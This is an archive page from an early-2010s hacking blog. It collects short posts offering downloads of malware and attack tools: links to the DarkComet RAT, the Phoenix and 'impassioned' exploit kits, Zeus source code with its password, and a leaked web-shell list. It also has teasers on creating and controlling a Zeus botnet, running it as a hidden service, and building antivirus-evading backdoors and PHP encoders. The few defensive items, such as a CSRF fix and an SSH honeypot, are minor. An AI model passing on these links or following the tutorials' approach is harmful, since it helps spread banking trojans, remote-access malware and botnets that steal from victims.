Showing posts with label bot. Show all posts
Showing posts with label bot. Show all posts

Saturday, 7 July 2012

DarkComet RAT Analyser and Link Download Of DarkComet 5.3.1

This download is the last version of DarkComet RAT 'cause DarkcoderSc (Jean-Pierre LESUEUR) announce he will end developing DarkComet RAT(you can get his announcement here.)

So this post is for who want to download the DarkComet RAT 5.3.1 (The last version that I can find)
http://cyber-store.net/downloads/DarkComet/DarkComet%20-%20v.5.3.1%20FWB.rar
http://199.91.152.33/waavkhu9i5hg/

Monday, 25 June 2012

BoNeSi - the DDoS Botnet Simulator

If you want to see demo video of this tool, please go to the Source.

BoNeSi, the DDoS Botnet Simulator is a Tool to simulate Botnet Traffic in a testbed environment on the wire. It is designed to study the effect of DDoS attacks.What traffic can be generated?BoNeSi generates ICMP, UDP and TCP (HTTP) flooding attacks from a defined botnet size (different IP addresses). BoNeSi is highly

Thursday, 29 December 2011

Ultimate Encoder - PHP Encoder with multiple compression by lionaneesh

Ultimate Encoder" - Another Online tool by lionaneesh,
an Indian developer and Hacker. Its a PHP Encoder with multiple
compression. A Piece of code can be encoded multiple times making it
impossible for any Anti Virus to detect it




Source: http://thehackernews.com/2011/12/ultimate-encoder-php-encoder-with.html




 
If you like my blog, Please Donate Me




One Dollar $1.00 Two Dollar

Thursday, 20 October 2011

Howto: Create And Control ZEUS Bot.

So today we are going to learn another botnet, THE ZEUS BOT, yes you read it correct.
I don't think that you may not have heard about Zeus, it's one of the most dangerous bot in the world.
But why I'm showing it??

Because I want you to learn the most hazardous attacks of the world, not just hacking with some tools like
skr!p7 k!dd!3s....I want you to be a proffessional, not a hacker.

You can

Preventing CSRF With Ajax


You can try to apply the ValidateAntiForgeryTokenAttribute attribute to an action
method, but it will fail every time if you try to post JSON encoded data to the
action method. On one hand, the most secure action possible is one that rejects
every request. On the other hand, that’s a lousy user experience.


The problem lies in the fact that the under the hood, deep within the call
stack, the

Wednesday, 19 October 2011

Kippo The SSH Honeypot




Kippo is a medium interaction SSH honeypot designed to
log brute force attacks and, most importantly, the entire shell
interaction performed by the attacker.


How to run it?
Edit kippo.cfg to your liking and start the honeypot by running:
./start.sh
start.sh
is a simple shell script that runs Kippo in the background using
twistd. Detailed startup options can be given by running twistd

Friday, 14 October 2011

Create Backdoor With Evading Antivirus


If you want to see full detail, please go to the Source.



TIP #1: Do your reconnaissance. Know what antivirus software target
system personnel are running. While it is certainly possible to make a
backdoor that evades all antivirus software products, there is no need
to waste those cycles if your target is only running one product, a
significant likelihood. Narrow down your options by

Monday, 10 October 2011

WebCookiesSniffer - New cookies sniffer/viewer utility





WebCookiesSniffer
is a new packet sniffer utility that captures all web site cookies sent
between the web browser and the web server and displays them in a
simple cookies table. The upper pane of WebCookiesSniffer displays the
cookie string and the web site/host name that sent or received this
cookie. When selecting a cookie string in the upper pane,
WebCookiesSniffer parses the cookie

MSFConsole Prompt Fiddling












Metasploit has multiple ways of
creating logs:




cat ~/.msf4/logs/framework.log      
This log automatically logs all of the error data that is great for
trouble shooting when something is working, but doesn't record what you
are doing inside of msfconsole


msf> spool ~/myclient.log
The spool command is great for logging output

Weevely create and manage PHP trojan designed to be hardly detectable




This
software is a proof of concept of an unobtrusive PHP backdoor that
simulate a complete telnet-like connection, hidden datas in HTTP
referers and using a dynamic probe of system-like functions to bypass
PHP security restrictions.

Usage:




Select All Code:


root@bt:/weevely# ./main.py -h
 
Weevely 0.3 - Generate and manage stealth PHP backdoors.
Copyright (c) 2011-2012 Weevely

Gateway-finder [ Scapy Script find Gateway IP in the LAN]

Gateway-finder is a scapy script that will help you determine which of the systems on the local LAN has IP forwarding enabled and which can reach the Internet.

This can be useful during Internal pentests when you want to quickly check for unauthorised routes to the Internet (e.g. rogue wireless access points) or routes to other Internal LANs. It doesn't perform a hugely thorough check, but it

Monday, 3 October 2011

Cracking MD5/SHA1 Hash In The Cloud

Welcome to CloudCracker.net, your FREE online MD5/SHA1 hash
cracker/generator. Simply paste an MD5 hash or a SHA1 hash you want to
crack or a word you want to hash into the box and hit the button. Our
funky system will auto-detect what you've entered and hash/crack it
accordingly.



Source: http://www.cloudcracker.net/


If you like my blog, Please Donate Me




One Dollar $1.00 Two

Sunday, 21 August 2011

DarkComet-RAT v.4.0(fix1) Was Release

DarkComet-RAT v4.0 Change log
- DarkComet-RAT is now compiled on Delphi XE instead of Delphi 2010.
- Synthax highlighter added in remote keylogger.
- Multithreading is now more efficient, no more freezing, using a new powerfull and stable methode (still using pure Win32 API both side for it)
- Get hard drive information added in file manager
- Bot logs in main form had change, it is more

Thursday, 11 August 2011

SpyEye 1.3.45 Download - Loader source code was release





A new fresh and sophisticated web-based bot named SpyEye is around in the markets and looks like to be the possible successor of the famous Zeus Trojan due to its very interesting features, with the main objective to steal bank accounts, credit cards, ftp accounts and other sensitive data from the victim’s computer.SpyEye was written in C++ and the size of the compiled binary is of 60

Sunday, 26 June 2011

AnonOps Shell List Leaked

I don't want to explain anything about it, please take a look by yourself.

View: http://pastebin.com/ZDyb4UM5
Download: http://www.wupload.com/file/34529452/AnonOps_Shell_List_Leaked.docx

Wednesday, 8 June 2011

Ani-Shell: Mass Mailer, Web-Server Fuzzer, DDoser

Ani-Shell is a simple PHP shell with some unique features like Mass Mailer , A simple Web-Server Fuzzer , and a DDoser!

Features of Ani-Shell
Shell
Plateform Independent
Mass – Mailer
Small Web-Server Fuzzer
DDoser
Design

Source: http://www.pentestit.com/2011/06/08/anishell-mass-mailer-webserver-fuzzer-ddoser/

Wednesday, 1 June 2011

Malware List In My Blog

You can download here, but please don't use in illegal.   Phoenix exploit kit 2.5 impassioned Framework Blackhole Exploit Kit Unknown Exploit Kit Zeus 2.5 Source Code [password: zeus]

Thursday, 26 May 2011

Phoenix exploit kit 2.5 leaked, Download Now !

The latest version of the Phoenix Exploit Kit currently has payloads for nine different system configurations, including:

    * XPIE7: Internet Explorer 7 and either Windows XP, Windows XP SP2, or Windows 2003
    * VISTAIE7: Internet Explorer 7 and Windows Vista
    * XPIE8: Internet Explorer 8 and either Windows XP, Windows XP SP2, or Windows 2003
    * VISTAIE8: Internet Explorer 8 and

Monday, 23 May 2011

impassioned Framework, New Exploit Kit was released now.

The another exploit kit was public and download free again. Try it by yourselves but use to learning only.


Download: http://www.multiupload.com/9ELC2CART6

Or

http://www.wupload.com/file/4411707/impassioned_FrameShit.rar
Source: http://www.thehackernews.com/2011/05/impassioned-framework-download-another.html

Howto: Setup Zeus as a hidden service.

Untitled from drebin on Vimeo.
Source: http://vimeo.com/20854260